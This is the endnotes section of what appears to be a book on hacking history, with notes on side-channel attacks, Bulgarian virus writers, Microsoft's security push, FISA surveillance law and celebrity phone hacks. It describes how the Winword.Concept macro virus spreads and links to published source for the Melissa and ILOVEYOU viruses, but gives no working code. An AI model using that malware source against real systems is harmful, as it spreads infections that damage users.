code needs energy: Exploiting the physical properties of a computing device is known as a side-channel attack. A side-channel attack does not strike at downcode directly, by exploiting software bugs; it does so indirectly by observing how software runs on hardware and deducing sensitive information from these physical observations. Here are three examples of side-channel attacks. 1) Power analysis attacks: Like all computer programs, an encryption algorithm requires energy to run. However, that energy is not constant; the voltage of the semiconductors, for instance, will fluctuate depending on the contents of the code being executed. In other words, the encryption key located in the encryption algorithm downcode leaves a trace in the computer’s physical processes. By observing the fluctuation in electrical current, hackers can deduce the encryption key, thereby gaining access to the encrypted content. See generally Paul Kocher, Joshua Jaffe, and Benjamin Jun, “Introduction to Differential Power Analysis and Related Attacks,” Cryptography Research, 1998, https://www.rambus.com/wp-content/uploads/2015/08/DPATechInfo.pdf; 2) Timing attacks: Timing attacks function similarly to power analysis attacks in that they use the physical processes of a computer to detect leaked information indirectly. Imagine your phone password is 224466. To check if a password is correct, the device could simply check the first digit of the password. If it’s not a 2, the device would determine that the password is incorrect. If it is a 2, the device would then move on to the next digit and repeat the process. Because checking each digit takes time, it takes longer to reject the password 200000 than to reject 100000. It takes even longer to reject 224465. A timing attack takes advantage of this timing information to deduce your password. If I observe that “200000” takes longer to check than “100000,” I can deduce that your password starts with a 2. Digit by digit, I can deduce your entire password—all without ever accessing the memory where the password is stored. See, e.g., Paul C. Kocher, “Timing Attacks on Implementations of Diffie-Hellman, RSA, DSS, and Other Systems,” in Advances in Cryptology—CRYPTO ’96, ed. Neal Koblitz, 16th Annual International Cryptology Conference (Heidelberg: Springer, 1996): 104–13. 3) Fault attacks: In power analysis and timing attacks, hackers deduce code. In a fault attack, the hacker can use the physical properties of the hardware to change code. Rowhammer, for example, exploits the fact that individual RAM cells can leak their physical charge to nearby cells. A RAM cell’s contents are binary and determined by its charge; a charged cell has a value of “1,” while a discharged cell stores a value of “0.” Leaking physical charge, then, can change content. By accessing a row of memory repeatedly in rapid succession, you can influence secure data. Yoongu Kim, et al., “Flipping Bits in Memory Without Accessing Them: An Experimental Study of DRAM Disturbance Errors,” 2014 ACM/IEEE 41st International Symposium on Computer Architecture, 361–72; Mark Seaborn, “Exploiting the DRAM rowhammer bug to gain kernel privileges,” Project Google Zero (blog), March 9, 2015, https://googleprojectzero.blogspot.com/2015/03/exploiting-dram-rowhammer-bug-to-gain.html. In 2016, for instance, it was reported that rowhammer attacks could be used to root Android phones (the equivalent of “jailbreaking an iPhone” for Android)—despite the fact that Android downcode prevents root access. See Dan Goodin, “Using Rowhammer Bitflips to Root Android Phones Is Now a Thing,” Ars Technica, October 23, 2016, https://arstechnica.com/information-technology/2016/10/using-rowhammer-bitflips-to-root-android-phones-is-now-a-thing/. Note that polygraphs, in which the tester monitors physiological reactions such as heart rate, blood pressure, and skin conductivity to determine whether the subject is lying, is itself a side-channel attack.
“The first and most important”: Vesselin Bontchev, “The Bulgarian and Soviet Virus Factories,” Proceedings of the 1st International Virus Bulletin Conference, 1991, 11–25.
copying Western computers: For a comprehensive history of the Bulgarian computer industry, see Victor P. Petrov, “A Cyber-Socialism at Home and Abroad: Bulgarian Modernisation, Computers, and the World, 1967–1989” (PhD diss., Columbia University, 2017).
“In the U.S.A.”: David S. Bennahum, “Heart of Darkness,” Wired, November 1, 1997, https://www.wired.com/1997/11/heartof.
socialist bloc: Bennahum, “Heart of Darkness.”
U.S. Constitution: Cf. Robert J. Kroczynski, “Are the Current Computer Crime Laws Sufficient or Should the Writing of Virus Code Be Prohibited?,” Fordham Intellectual Property, Media and Entertainment Law Journal, 2008.
purely DOS viruses: One significant problem is proving mental state. The CFAA of 1986 required “knowingly or “intentionally” for each particular act. Congress attempted to respond to the problem of viruses in the Virus Eradication Act of 1989, which was voted out by House and Senate committees but died. See Raymond L. Hansen, “The Computer Virus Eradication Act of 1989: The War Against Computer Crime Continues,” Software Law Journal, 1990, 717–53.
Katrin Totcheva: Zoom (audio) interview with author, November 20, 2020.
Princess Diana: The Iron Maiden titles “Somewhere in Time,” “The Evil That Men Do,” “Only the Good Die Young,” and “The Number of the Beast” all make cameos in his viruses. In Eddie, the string Diana P. appears. Diana is not a common Bulgarian name.
her subjects: Sarah Gordon, “The Generic Virus Writer,” vX Heaven, September 1994, https://ivanlef0u.fr/repo/madchat/vxdevl/papers/avers/gvw1.html. On viruses in the wild, see Sarah Gordon, “What Is Wild?,” 20th National Information Systems Security Conference, 1997, csrc.nist.gov/csrc/media/publications/conference-paper/1997/10/10/proceedings-of-the-20th-nissc-1997/documents/177.pdf.
“in the wild”: Gordon, “What Is Wild?”
Another possibility was suggested by: Personal communication, Peter Radatti, June 10, 2021.
the same barriers: Alice Hutchings and Yi Ting Chua, “Gendering Cybercrime,” in Cybercrime Through an Interdisciplinary Lens, ed. Thomas J. Holt (New York: Routledge, 2016), 167–88. For contemporaneous reports, see Sascha Segan, “Facing a Man’s World: Female Hackers Battle Sexism to Get Ahead,” ABC News, accessed May 27, 2020, https://web.archive.org/web/20000815232927/http://www.
abcnews.go.com/sections/tech/DailyNews/hackerwomen000602.html. See more generally Christina Dunbar-Hester, Hacking Diversity: The Politics of Inclusion in Open Technology Cultures (Princeton, NJ: Princeton University Press, 2019).
regular contact: Sarah Gordon, “Inside the Mind of Dark Avenger,” Cryptohub, January 1993, https://cryptohub.nl/zines/vxheavens/lib/asg02.html.
(with Dark Avenger’s permission): Gordon, “Inside the Mind.”
“Please, let’s not talk”: Gordon, “Inside the Mind.”
When I asked: Interview VB.
Dark Avenger’s true identity: Pauline Boudry, Copy Me—I Want to Travel, 2004.
hostile response: Bennahum, “Heart of Darkness.”
was leaked: The footage was licensed by Don Thrasher, Rick Salomon’s friend, to Marvad, an Internet pornography shop, for $50,000 in August 2003. “Paris Pal Sells Sex Tape for $50,000,” The Smoking Gun, November 17, 2003, https://www.thesmokinggun.com/documents/crime/paris-pal-sold-sex-tape-50k. According to the licensing agreement, “WHEREAS, Solomon [sic] wishes to clear his good name and wishes to prove to the public that he is honest, that the Video does exist, and that the content of the Video demonstrates Hilton’s desire for the same to be viewed by third parties; WHEREAS, Solomon granted LICENSOR [Thrasher] a perpetual non-exclusive worldwide transferrable license…,” https://www.thesmokinggun.com/file/paris-pal-sold-sex-tape-50k.
without her consent: Constance Grady, “Paris Hilton’s Sex Tape Was Revenge Porn. The World Gleefully Watched,” Vox, May 25, 2021, www.vox.com/culture/22391942/paris-hilton-sex-tape-revenge-porn-south-park-stupid-spoiled-whore-video-play-set-pink-stupid-girl.
As venal: John Leland, “Once You’ve Seen Paris, Everything Is E = mc2,” The New York Times, November 23, 2003.
for a reported $400,000: Salomon sued Hilton, her family, and her publicist for defamation, alleging that they had waged a “cold, calculated and malicious campaign to portray Salomon as a rapist” to protect her image. “Heiress Sued Over Sex Tape,” CBSNews.com, November 20, 2003, https://www.cbsnews.com/news/heiress-sued-over-sex-tape. Hilton sued the distribution company for invading her privacy, but a judge dismissed her suit. “LA Court Demolishes Paris Hilton,” The Record, July 13, 2004, https://www.theregister.com/2004/07/13/hilton_lawsuit_dismissed. Rick Salomon then dropped his suit as part of the settlement. Stephen M. Silverman, “Hilton, Salomon End Sex-Tape Legal Battle,” People, July 13, 2004; Gary Susman, “Paris Hilton Donates Porn Proceeds to Charity,” Entertainment Weekly, July 13, 2004, https://ew.com/article/2004/07/13/paris-hilton-donates-porn-proceeds-charity.
pictures, emails, notes, and contacts: Samantha Martin, “Massachusetts Teen Convicted for Hacking into Internet and Telephone Service Providers and Making Bomb Threats to High Schools in Massachusetts and Florida,” U.S. Department of Justice, District of Massachusetts, September 8, 2005, web.archive.org/web/20130415114032/http://www.justice.gov/
criminal/cybercrime/press-releases/2005/juvenileSentboston.htm.
“She was pretty upset”: John Schwartz, “Some Sympathy for Paris Hilton,” The New York Times, February 27, 2005.
“birth control kill pill”: Jessica, “The Collected Works of Paris Hilton’s Hacked Sidekick,” Gawker, February 21, 2005, gawker.com/033643/the-collected-works-of-paris-hiltons-hacked-sidekick.
changed their numbers: Jayfrankwilson, “Paris Hilton Phone Hack Exposes Nude Photos and Phone Numbers (2005),” Methodshop, June 2, 2020, methodshop.com/paris-hilton-phone-hack.
“A modern general-purpose”: Thomas Anderson and Michael Dahlin, Operating Systems: Principles and Practice, vol. 1, Kernels and Processes (West Lake Hills, TX: Recursive Books, 2011).
“Hello, world!”: The first example is from Brian Kernighan and Dennis M. Ritchie, The C Programming Language, 2nd edition (Englewood Cliffs, NJ: Prentice Hall, 1988), 8. The second example is from Charles Petzhold, Programming Windows, 5th edition (Redmond, WA: Microsoft Press, 1999), 6. The second example differs from the first by printing “Hello, world!” in a text box.
commercial failures: Benj Edwards, “What Was IBM’s OS/2, and Why Did It Lose to Windows?,” How-To Geek, September 21, 2020, www.howtogeek.com/688970/what-was-ibms-os2-and-why-did-it-matter. Arguably, IBM was the technically superior operating system, having the featured “preemptive multitasking” that allowed for smoother running of multiple applications.
Winner Take All market: Robert H. Frank and Philip Cook, The Winner-Take-All Society: Why the Few at the Top Get So Much More Than the Rest of Us (New York: Free Press, 1995).
desktop computing: See statcounter GlobalStats, “OS Market Share” for Desktop and Mobile, https://gs.statcounter.com/os-market-share. While Microsoft dominates the desktop with 75 percent, it barely registers in the mobile market at 0.02 percent.
market is “non-ergodic”: Paul A. David, “Clio and the Economics of QWERTY,” American Economics Review 75 (1985).
combined wealth of $250 billion: India Bureau, “Top 20 Richest People in the World: Some Interesting Facts About the List,” Business Insider India, April 6, 2022, https://www.businessinsider.in/finance/news/list-of-top-20-richest-people-in-the-world/articleshow/74475220.cms.
QWERTY typewriters: Tim McDonald, “Why We Can’t Give Up This Odd Way of Typing,” BBC Worklife, May 24, 2018, www.bbc.com/worklife/article/20180521-why-we-cant-give-up-this-odd-way-of-typing.
without a state’s consent: The free states were the strongest proponents of equal representation for each state in the Senate because the slave states, though small, were growing rapidly.
university website: Material from Kathy Rebello, “Inside Microsoft,” https://www.bloomberg.com/news/articles/1996-07-14/inside-microsoft. Sinofsky’s account: https://hardcoresoftware.learningbyshipping.com/p/024-discovering-cornell-is-wired.
“Cornell is WIRED!”: Bill Steele, “Gates Sees a Software-Driven Future Led by Computer Science,” Cornell Chronicle, March 4, 2004, news.cornell.edu/stories/2004/03/gates-sees-software-driven-future-led-computer-science. Gates contributed a new computer-science building to replace Upson Hall.
The World Wide Web: Tim Berners-Lee, Weaving the Web: The Original Design and Ultimate Destiny of the World Wide Web (New York: Harper Business, 2000).
experiencing explosive growth: “Share of the Population Using the Internet, 1990 to 1995,” Our World in Data, accessed June 2021, https://ourworldindata.org/grapher/share-of-individuals-using-the-internet?tab=chart&time=1990.1995&country=~USA.
PC-DOS: Bob Zeidman, “Did Bill Gates Steal the Heart of DOS?,” IEEE Spectrum: Technology, Engineering, and Science News, June 31, 2012, spectrum.ieee.org/computing/software/did-bill-gates-steal-the-heart-of-dos.
Microsoft followed suit: In 1988, Apple sued Microsoft and Hewlett Packard for copyright infringement, claiming that their graphical user interfaces were too similar to those of the Lisa and Macintosh operating systems. Xerox, in turn, sued Apple, claiming that Apple had infringed its copyright. Both Apple and Xerox lost in the district court. Apple lost on appeal. Apple Computer, Inc. v. Microsoft Corporation, 35 F.3d 1435 (9th Cir., 1994).
sales tripled: “The History of Microsoft: 1993,” https://docs.microsoft.com/en-us/shows/history/history-of-microsoft-1993.
Microsoft’s singular concern: Lance Ulanoff, “Remembering the Windows 95 Launch: A Triumph of Marketing,” Mashable, August 24, 2015, mashable.com/2015/08/24/remembering-windows-95-launch/?europe=true.
“bugging us about this”: Rebello, “Inside Microsoft,” Business Week; see Steven Sinofsky (@stevesi), “Telling the Untold Story in ‘Hardcore Software’ (inside the rise and fall of the PC revolution)…,” Twitter, May 30, 2021.
“I was a lonely voice”: Rebello, “Inside Microsoft,” Business Week.
compatible with Microsoft: Michael Calore, “April 22, 1993: Mosaic Browser Lights Up Web with Color, Creativity,” Wired, April 22, 2010, www.wired.com/2010/04/0422mosaic-web-browser.
ventured into cyberspace: Intrepid users dialed directly into the internet using early internet service providers. See “Ten Early ISPs and What Has Become of Them,” ISP.com blog, March 7, 2011, https://www.isp.com/blog/10-early-isps-and-what-has-become-of-them.
messages on public forums: Benj Edwards, “The Lost Civilization of Dial-Up Bulletin Board Systems,” The Atlantic, November 4, 2016, https://www.theatlantic.com/technology/archive/2016/11/the-lost-civilization-of-dial-up-bulletin-board-systems/506465/. On the role of BBSs as an introduction to hacking, Joseph Menn, Cult of the Dead Cow (New York: Public Affairs, 2019). See also Bruce Sterling, The Hacker Crackdown: Law and Disorder on the Electronic Frontier (New York: Bantam Books, 1992), 68–73.
known as newsgroups: Unlike bulletin boards, however, Usenet was designed to be a global system of news servers. Michael Hauben, Ronda Hauben, and Thomas Truscott, Netizens: On the History and Impact of Usenet and the Internet (Los Alamitos, CA: IEEE Computer Society Press, 1997), http://www.columbia.edu/~rh120/.
others sought: On the history of online services, see Brian McCullough, How the Internet Happened: From Netscape to the iPhone (New York: Liveright, 2018), 52–68.
$9.95 per month: Peter H. Lewis, “Personal Computers; An Atlas of Information Services,” The New York Times, November 1, 1994.
half of all CDs: M. G. Siegler, “How Much Did It Cost AOL to Send Us Those CDs in the 90s? ‘A Lot!,’ Says Steve Case,” Techcrunch, December 27, 2010, https://techcrunch.com/2010/12/27/aol-discs-90s/.
subscriber base: Mark Nollinger, “America, Online!,” Wired, September 1, 1995, https://www.wired.com/1995/09/aol-2/.
(FTP): In mid-1993, FTP accounted for the largest use of the backbone, 42.9 percent, as opposed to web traffic, which accounted for a mere 0.5 percent. See Matthew Gray, “Web Growth Summary,” http://www.mit.edu/people/mkgray/net/printable/web-growth-summary.html. Gray’s data is from the Merit Internet Backbone Report, but the link provided is broken. As a result, I could not confirm these numbers from the original source.
gated online services: Peter H. Lewis, “Business Technology: Prodigy Leads Its Peers onto the World Wide Web,” The New York Times, January 18, 1995.
different bets: Paul E. Ceruzzi, A History of Modern Computing, 2nd ed. (Cambridge, MA: MIT Press, 2002), 303.
the internet thus far: Tony Long, “Aug. 9, 1995: When the Future Looked Bright for Netscape,” Wired, August 9, 2007, www.wired.com/2007/08/aug-9-1995-when-the-future-looked-bright-for-netscape. Netscape’s 88 percent internet share was finally toppled by the Windows 95–Internet Explorer bundle.
explosion: Data from Matthew Gray, “Measuring the Growth of the Web: June 1993 to June 1995,” http://www.mit.edu/people/mkgray/growth/.
the business opportunity: Rebello, “Inside Microsoft.”
attempt to take on Netscape: Ben Slivka, “The Web Is the Next Platform, 5/27/1995,” Ben Slivka: My Thoughts on Your Future (blog), August 15, 2017, benslivka.com/2017/08/15/the-web-is-the-next-platform-5271995.
“A company like Siemens or Matsushita”: Slivka’s memo, 2.
“The Internet Tidal Wave”: Wired staff and Bill Gates, “May 26, 1995: Gates, Microsoft Jump on ‘Internet Tidal Wave,’” Wired, May 26, 2010, www.wired.com/2010/05/0526bill-gates-internet-memo.
Clinton Department of Justice: Complaint: U.S. v. Microsoft Corp, U.S. Department of Justice, May 18, 1998, www.justice.gov/atr/complaint-us-v-microsoft-corp.
Slate, a new web magazine: Microsoft, “Inaugural Issue of Slate, New Interactive Magazine from Microsoft and Editor Michael Kinsley, to Debut Online Today,” Stories, June 24, 1996, news.microsoft.com/1996/06/24/inaugural-issue-of-slate-new-interactive-magazine-from-microsoft-and-editor-michael-kinsley-to-debut-online-today.
do it for you: For examples of macros and how they are written: J. D. Sartain, “Word Macros: Four Examples to Automate Your Documents,” PCWorld, March 5, 2020, www.pcworld.com/article/2952126/word-macros-three-examples-to-automate-your-documents.html.
great destructive potential: Sarah Gordon, “What a (Winword.)Concept,” Virus Bulletin, September 1995, 8–9, https://www.virusbulletin.com/uploads/pdf/magazine/1995/
199509.pdf; Sarah Gordon, “What Is Wild?,” 20th National Information Systems Security Conference, 1997, csrc.nist.gov/csrc/media/publications/conference-paper/1997/10/10/proceedings-of-the-20th-nissc-1997/documents/177.pdf.
Word would execute the virus: I am simplifying here. Winword.Concept contained several macros. The first was AutoOpen, which allows users to configure their Word documents. Because AutoOpen is designed to run any macro embedded within a Word document, AutoOpen first checks to see if another copy of it is running on the system. If there isn’t, it copies the second macro, FileSaveAs, to Normal.Dot, Word’s default template. Anytime users employ the File Save As command, Word uses the FileSaveAs macro in Normal.Dot. Winword.Concept also contained a Payload macro that is not only harmless but never executed.
“expect to see more of this type of virus”: Gordon, “What a (Winword.)Concept.”
Research must be conducted rigorously: See also Eugene Spafford, “Computer Viruses and Ethics,” Purdue Technical Report CSD-TR-91–061, 18: “Claiming that writing computer viruses is experimental is akin to saying that mixing chemicals together in a flask to see if it explodes is a scientific experiment.”
“virus writers of tomorrow”: “The Generic Virus Writer II,” www.vX-underground.org/archive/vXHeaven/lib/asg04.html. See also Spafford, “Computer Viruses,” 21: “We should make it clear to our peers, our students, and our employers. We need to make it clear that writing viruses is not done for ‘fun,’ and neither is it acceptable behavior.”
Melissa: Melissa was the name of the class module that held the macro. Peter Deegan, “The Not So Lovely Melissa,” ZDNET, March 27, 1999. Melissa source code is available here: https://www.cs.miami.edu/home/burt/learning/Csc521.061/notes/melissa.txt.
fifty contacts as well: Ian Whalley, “Melissa—the Little Virus That Could…,” Virus Bulletin, ed. Francesca Thorneloe, May 1999, 5–6, https://www.virusbulletin.com/virusbulletin/2015/06/throwback-thursday-melissa-little-virus-could-may-1999.
twenty months in federal prison: Smith pleaded guilty in December 1999. He was sentenced to twenty months in federal prison and fined $5,000 in May 2002. “Creator of Melissa Computer Virus Sentenced to 20 Months in Federal Prison,” press release, U.S. Department of Justice, May 1, 2002, www.justice.gov/archive/criminal/cyber-crime/press-releases/2002/melissaSent.htm.
“sneakernet”: Funny. Randall Munroe, “FedEx Bandwidth,” What If?–Xkcd, Spring 2012, what-if.xkcd.com/31.
voyage to the United States: Personal communication, Peter Radatti, June 10, 2021.
antivirus protection wasn’t very useful: As Vesselin Bontchev argued, users don’t run one another’s macros, so it made little sense to let users run untrusted macros. Macro viruses declined rapidly when Microsoft switched the default to executing only digitally signed macros: Vesselin Bontchev, “The Real Reason for the Decline of the Macro Virus,” Virus Bulletin, January 1, 2006, https://www.virusbulletin.com/virusbulletin/2006/01/real-reason-decline-macro-virus/.
repeatedly executed the virus: Nick FitzGerald, “Throwback Thursday: When Love Came to Town,” Virus Bulletin, ed. Martijn Grooten, June 2000, www.virusbulletin.com/virusbulletin/2015/05/throwback-thursday-when-love-came-town-june-2000. Two months after the virus was released, the Philippine Congress enacted Republic Act #8792, also known as the E-Commerce Act, which prohibited the release of viruses on the internet.
thought to top $10 billion: C. J. Robles, “ILOVEYOU Virus: 20 Years After the Malware Caused $10B Losses Worldwide,” Tech Times, May 3, 2020, www.techtimes.com/articles/249312/20200503/remembering-iloveyou-virus-20-years-after-the-destructive-virus-caused-10b-losses.htm.
several vulnerabilities: ILOVEYOU source code, https://github.com/onx/ILOVEYOU/blob/master/LOVE-LETTER-FOR-YOU.TXT.vbs. For a line-by-line analysis of the source code, see Radsoft, “ILOVEYOU: Line for line,” Radsoft.net, n.d., https://radsoft.net/news/roundups/luv/luv_src.shtml.
“There may have been”: Craig Timberg, “These Hackers Warned the Internet Would Become a Security Disaster. Nobody Listened,” The Washington Post, June 22, 2015.
Microsoft externalized costs: Unlike the vast and variegated PC hardware marketplace, Apple had an easier time coping with device drivers; it has a considerably smaller range of devices to manage.
by an Argentinean hacker: “Kournikova Computer Worm Hits Hard,” BBC News, February 13, 2001, http://news.bbc.co.uk/2/hi/science/nature/1167453.stm; Graham Cluley, “Memories of the Anna Kournikova Worm,” Naked Security, February 11, 2011.
White House web server: Carolyn Meinel, “Code Red: Worm Assault on the Web,” Scientific American, October 28, 2002.
clicked on the email attachment: “Beast,” https://en.wikipedia.org/wiki/Beast_(Trojan_horse). Beast is a remote administration tool (RAT).
cannot recover for lost wages: “The most general statement of the economic loss rule is that a person who suffers only pecuniary loss through the failure of another person to exercise reasonable care has no tort cause of action against that person.” Jay Feinman, “The Economic Loss Rule and Private Ordering,” Arizona Law Review 48: 813 (2006).
Congress made an exception: Computer Abuse Amendments Act of 1994, Public Law No. 103-322, 108 Stat. 2097.
Patriot Act: Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism (USA PATRIOT) Act of 2001, Public Law No. 107-56, 115 Stat. 272, Sec 814(e).
“warrant of merchantability”: “Where the seller at the time of contracting has reason to know any particular purpose for which the goods are required and that the buyer is relying on the seller’s skill or judgment to select or furnish suitable goods, there is unless excluded or modified under the next section an implied warranty that the goods shall be fit for such purpose.” UCC Article 2, Part 3, General Obligation and Construction of Contract §2-315. Implied Warranty: Fitness for Particular Purpose.
disclaim this warranty: UCC §2-316. Exclusion or Modification of Warranties.
sign anyway: David Berreby, “Click to Agree with What? No One Reads Terms of Service, Studies Confirm,” The Guardian, March 3, 2017.
“The broad issue is”: Steve Lohr, “Product Liability Lawsuits Are New Threat to Microsoft,” The New York Times, October 6, 2003.
fiber-optic internet cables: Fiber-optic cables are harder to tap underwater than traditional copper cables. Charles Savage, Power Wars: A Relentless Rise of Presidential Authority (New York: Back Bay, 2015), 173.
the “tubes”: “The internet is not something that you just dump something on, it’s not a big truck, it’s, it’s a series of tubes” Alex Gangitano, “Flashback Friday: ‘A Series of Tubes’ Roll Call,” Roll Call, February 16, 2018, https://www.rollcall.com/2018/02/16/flashback-friday-a-series-of-tubes/.
leaked NSA documents: “ST-09–002 Working Draft,” draft NSA IG report, Office of the Inspector General, March 24, 2009.
collection on American soil: The Foreign Intelligence Surveillance Act defines “foreign intelligence” broadly: any matter that “relates to (A) the national defense or the security of the United States; or (B) the conduct of the foreign affairs of the United States”: 50 U.S. Code §1801(e)(2). According to Executive Order 12333, known as “12 Triple 3,” the NSA can hack anything it wants outside the United States, as long as it is not targeting an American citizen or permanent resident, known as a “US Person.” But hacking inside the country is domestic spying and is subject to strict controls. For the authority on all matters FISA, see David S. Kris and J. Douglas Wilson, National Security Investigations and Prosecutions 3d (Eagan, MN: Thomson-Reuters, 2019).
Foreign Intelligence Surveillance Act of 1978: Pub.L. 95–511, 92 Stat. 1783, 50 USC ch. 36.
they are nonetheless substantial: Instead of alleging probable cause that the target committed a crime, a FISA warrant must allege probable cause that target is a foreign power or an agent of a foreign power who has foreign intelligence.
a single telephone call: “Warrantless Surveillance and the Foreign Intelligence Surveillance Act: The Role of Checks and Balances in Protecting Americans’ Privacy Rights (Part II),” Hearing before the Committee on the Judiciary of the House of Representatives, 110th Congress, 1st Session, September 18, 2007, https://www.govinfo.gov/content/pkg/CHRG-110hhrg37844/html/CHRG-110hhrg37844.htm. For skepticism over this figure, see 5.
a serious criminal offense: 18 U.S. Code §2511 4(a).
unworkable in the internet age: FISA permitted the NSA to intercept international radio signals within the United States without a warrant, on the theory that only foreign powers would use them to communicate with one another, 50 U.S. Code §1801(f)(3). Wiretapping domestic cables without a warrant, however, was expressly forbidden, on the pain of criminal penalties, because American citizens used those cables to make telephone calls.
without FISA warrants: The White House placed constraints on this warrantless surveillance: it could be done only if the communications were believed to be related to terrorism, the communications were coming from outside the country, and the target of this communication was not an American citizen.
Stellarwind: For background on Stellarwind, see Savage, Power Wars, 180–87.
“obnoxious court”: Jack Goldsmith, The Terror Presidency: Law and Judgment Inside the Bush Administration (New York: Norton, 2007), 181.
The Reagan White House: Savage, Power Wars, 174.
“In the past”: Bill Gates, “Bill Gates: Trustworthy Computing,” Wired, January 17, 2002, www.wired.com/2002/01/bill-gates-trustworthy-computing.
also pricey: Michael Howard and David Le Blanc, Writing Secure Code, 2nd ed. (Redmond, WA: Microsoft Press, 2003), 127.
Nimda worm: Roman Danyliw, Chad Dougherty, Allen Householder, and Robin Ruefle, 2001 CERT Advisories, CA-2001-26: Nimda Worm, original release date: September 18, 2001, https://resources.sei.cmu.edu/asset_files/WhitePaper/2001_019_001_496192.pdf.
“When I told friends”: Timberg, “These Hackers Warned.”
a screeching halt: Michael Howard and Steven Lipner, “Inside the Windows Security Push,” IEEE Security & Privacy 1 (January–February 2003): 57–61, www.computer.org/csdl/magazine/sp/2003/01/j1057/
13rRUxlgxRG; Howard and Le Blanc, Writing Secure Code, xxiii.
turning these features off: When turned on, features should run with the least privileges necessary; in this way, a successful attacker would be able to exploit fewer privileges.
before the hackers could: Patrice Godefroid, “A Brief Introduction to Fuzzing and Why It’s an Important Tool for Developers,” Microsoft Research (blog), March 4, 2020, www.microsoft.com/en-us/research/blog/a-brief-introduction-to-fuzzing-and-why-its-an-important-tool-for-developers. Microsoft encourages all its third-party app developers to fuzz their software using a variety of techniques.
Windows free of charge: Microsoft, “Gates Highlights Progress on Security, Outlines Next Steps for Continued Innovation,” Stories, February 15, 2005, news.microsoft.com/2005/02/15/gates-highlights-progress-on-security-outlines-next-steps-for-continued-innovation.
Microsoft helped to halt: In addition to Defender, improvements in antivirus software, operating systems, firewalls, cloud computing, network scanning, and the phasing out of floppy disks all contributed to the eradication of viruses and vorms.
It evolved: “First, while viruses were more common than worms initially, worms have become the predominant threat in recent years, coinciding with the growth of computer networking.” Thomas M. Chen and Jean-Marc Robert, “The Evolution of Viruses and Worms,” in Thomas H. Chen, ed., Statistical Methods in Computer Security (Boca Raton, FL: CRC Press, 2004).
for sophisticated cybercriminals: Low-level criminals usually buy off-the-shelf malware from the Dark Web or other cybercriminal forums.
Equally concerning were bad coders: Thomas Ball et al., “SLAM and Static Driver Verifier: Technology Transfer of Formal Methods inside Microsoft,” Technical Report MSR-TR-2004–08, January 28, 2004, https://www.microsoft.com/en-us/research/wp-content/uploads/2016/02/tr-2004–08.pdf. See also Thomas Ball, Vladimir Levin, and Sriram K. Rajamani, “A Decade of Software Model Checking with SLAM,” Communications of the ACM 54, no. 7 (July 2011): 68–76, https://cacm.acm.org/magazines/2011/7/109893-a-decade-of-software-model-checking-with-slam/fulltext.
distributing the driver: Thomas Ball et al., “The Static Driver Verifier Research Platform,” Microsoft, citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.187.9452&rep=rep1&type=pdf.
95 percent of the browser market: Raising concerns in the Justice Department about market dominance: https://www.justice.gov/atr/file/704876/download.
discontinued the browser in 2003: Stephen Lawson, “AOL to End Support for Netscape Browser,” Network World, December 28, 2007, www.networkworld.com/article/2281861/aol-to-end-support-for-netscape-browser.html. Netscape lasted until 2008 under the Mozilla foundation name.
classics of Western philosophy: Jean-Jacques Rousseau, Discourse on the Origin of Inequality (Cambridge, MA: Hackett, 2010).
distinguish himself from others: According to Rousseau, natural man is born with amour de soi, which is a form of self-love that does not depend on other people’s opinions.
hunter-gatherer societies: See Azar Gat, War in Human Civilization (Oxford: Oxford University Press, 2008).
countercultural outsiders: See John Markoff, What the Dormouse Said: How the Sixties Counterculture Shaped the Personal Computer Industry (New York: Viking, 2005).
Congress updated FISA: The Protect America Act of 2007, Pub.L. 110–55, 121 Stat. 552; The FISA Amendments Act of 2008, Pub.L. 110–261, 122 Stat. 2437.
produce downcode securely: Many of the findings from the Windows Security Push were published in Howard and Le Blanc, Writing Secure Code.
as fast as they sprang up: Steve Hargreaves, “Paris Hilton Hacking Victim?,” CNN Money, May 2, 2005, money.cnn.com/2005/02/21/technology/personaltech/hilton_cellphone/?cnn=yes.
“evil maid” attack: Zidar mentioned T-Mobile’s investigation included the “possibility that someone had access to one of Ms. Hilton’s devices and/or knew her account password”: David Quinton, “T-Mobile Reacts to Hilton’s Sidekick Hack,” SC Media, February 22, 2005, https://www.scmagazine.com/home/security-news/t-mobile-reacts-to-hiltons-sidekick-hack/.
an attack called Bluesnarfing: John Markoff and Laura Holson, “An Oscar Surprise: Vulnerable Phones,” The New York Times, March 2, 2005.
Bluetooth technology: “Danger Hiptop 2 / Sidekick II,” Phone Scoop, https://www.phonescoop.com/phones/phone.php?p=560; Staci D. Kramer, “Paris Hilton: Hacked or Not?,” Wired, February 23, 2005, https://www.wired.com/2005/02/paris-hilton-hacked-or-not/.
Barack Obama admitted: Nick Statt, “Obama, Serious about Cybersecurity, Also Delivers Laughs,” CNET.com, February 13, 2015, https://www.cnet.com/news/privacy/obama-serious-about-cybersecurity-also-delivers-laughs.
Mark Zuckerberg’s Twitter: John Leyden, “Mark Zuckerberg’s Twitter and Pinterest Password Was ‘dadada,’” The Register, June 6, 2016, https://www.theregister.com/2016/06/06/facebook_zuckerberg_social_media_accnt_pwnage.
Kanye West’s pass code: Jason Parker, “Kanye West Meets with Trump, Reveals iPhone Passcode Is 000000,” CNET.com, October 11, 2018, https://www.cnet.com/culture/internet/kanye-west-meets-with-trump-reveals-iphone-passcode-is-000000.
favorite pet Chihuahua: Mike Masnick, “How Paris Hilton Got Hacked? Bad Password Protection,” Techdirt, February 22, 2005, www.techdirt.com/articles/20050222/2026239.shtml.
her phone number: Bruce K. Marshall, “Paris’s Password Reset Question Proves to Be a Poor Choice,” PasswordResearch.Com, February 19, 2005, passwordresearch.com/stories/story71.html.
Nicholas Jacobsen: Paul Roberts, “Paris Hilton May Be Victim of T-Mobile Web Holes,” Computerworld, March 1, 2005, www.computerworld.com/article/2569592/paris-hilton-may-be-victim-of-t-mobile-web-holes.html.
ongoing criminal investigations: Kevin Poulsen, “Hacker Breaches T-Mobile Systems, Reads US Secret Service Email and Downloads Candid Shots of Celebrities,” The Register, January 12, 2005, https://www.theregister.com/2005/01/12/
hacker_penetrates_t-mobile/.
deliver its file to my browser: kingthorin, “SQL Injection,” OWASP, accessed June 8, 2021, owasp.org/www-community/attacks/SQL_Injection.
simple example: Example from Peter Yaworski, Real-World Bug Hunting: A Field Guide to Web Hacking (San Francisco: No Starch, 2019), 82–83.
the following code: The snippets here are using the PHP server-side scripting language.
